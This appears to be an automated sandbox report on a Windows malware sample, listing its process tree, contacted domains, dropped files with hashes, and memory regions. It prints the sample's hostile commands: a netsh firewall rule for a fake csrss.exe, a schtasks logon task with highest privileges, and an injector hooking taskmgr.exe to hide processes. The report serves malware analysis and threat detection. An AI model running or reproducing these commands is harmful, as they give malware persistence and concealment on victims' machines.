C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1652
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1704
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4568 -ip 4568
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1456
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /197-197
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 776
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5352 -ip 5352
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1492
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1400
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1484
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 460
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5352 -ip 5352
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.113.22.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 37.48.65.151:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.233.44.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.65.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.225:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 225.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70c7f849-f917-48e2-957d-4b64ce8aeb84.ninhaine.com | udp |
| US | 8.8.8.8:53 | server11.ninhaine.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server11.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
memory/4592-1-0x0000000002B50000-0x0000000002F8E000-memory.dmp
memory/4592-2-0x0000000002F90000-0x00000000038B7000-memory.dmp
memory/4592-3-0x0000000000400000-0x000000000258E000-memory.dmp
memory/4592-5-0x0000000000400000-0x000000000258E000-memory.dmp
memory/4592-6-0x0000000002F90000-0x00000000038B7000-memory.dmp
memory/4568-7-0x00000000028D0000-0x0000000002D0E000-memory.dmp
memory/4568-8-0x0000000002D10000-0x0000000003637000-memory.dmp
memory/4568-9-0x0000000000400000-0x000000000258E000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 09af2a562bf25f83f51bf3699b16d5b6 |
| SHA1 | c187ffcf40d7998b46a3a9f14e1f638f8d49c5e4 |
| SHA256 | e4f27364add69769e2c783282969cb5a402357685ff2f0c935e15482b93def1b |
| SHA512 | 9e960c1c8c68cb9a36e7d544676b973c359d6373496af89d7d46a875ae0f9205de83cc8d82fd62af444f96696338ff13a36549a3cc70167dea3cb7fd7fc1e235 |
C:\Windows\rss\csrss.exe
| MD5 | a1fcc944237ba57f897d2c95bee0e044 |
| SHA1 | 0bb5a4ef2ccc2bb9d41cbf7082e3cbc49b7f5e27 |
| SHA256 | 3402853ea7ad2c249deac219cd7f3e535c36d5158adbfc3e4dfe1e610a36b63e |
| SHA512 | 1ea0b4a0b7a0c7153bdf4725c911f7af7f20475864f3e0095bb971ca009d9e4b2de1b1c51a04a0dd482acc337907b437073e33c12792ce2b72a65e62f78087fa |
memory/4568-17-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-21-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-20-0x0000000002E00000-0x0000000003300000-memory.dmp
memory/5352-22-0x0000000000400000-0x000000000258E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 5972f8a92166f37c67a3d70921794c96 |
| SHA1 | 0974e74b29054f7edc6f2275804a44623a575bda |
| SHA256 | e315541f6881f5032fefe499e1d82d7d36a6f51be91ee0f2422894aaa3644aaa |
| SHA512 | f76cf38b5f6911d6da78d8fbd5b8c7cd53f6292c4f2e9094e6c5c0950a2cc755fb24e5c7d82b01b47c4ed7039832dfab23b2b89d6fc67e8babee4f197cc01498 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | 1868d1207d734ac95ef900476b1d1fc2 |
| SHA1 | 58dc6fd96a51edd9894302048989a40f239159c2 |
| SHA256 | 7d75b5eb33370ba631f86ab8d9582866df942897066b2a12f10ae8b0202f48af |
| SHA512 | ce2a0b5d43539278aebde9e7389db357e4bcaf864227f46abc8565361c17ccfbac0a9c0ef058b71f35cb0331b910a70f40de9c9f05232fd8f7d5044ffefc470c |
memory/5352-29-0x0000000002E00000-0x0000000003300000-memory.dmp
memory/5352-28-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-30-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-31-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-32-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-33-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-34-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-35-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-36-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-37-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-38-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-39-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-40-0x0000000000400000-0x000000000258E000-memory.dmp
memory/5352-41-0x0000000000400000-0x000000000258E000-memory.dmp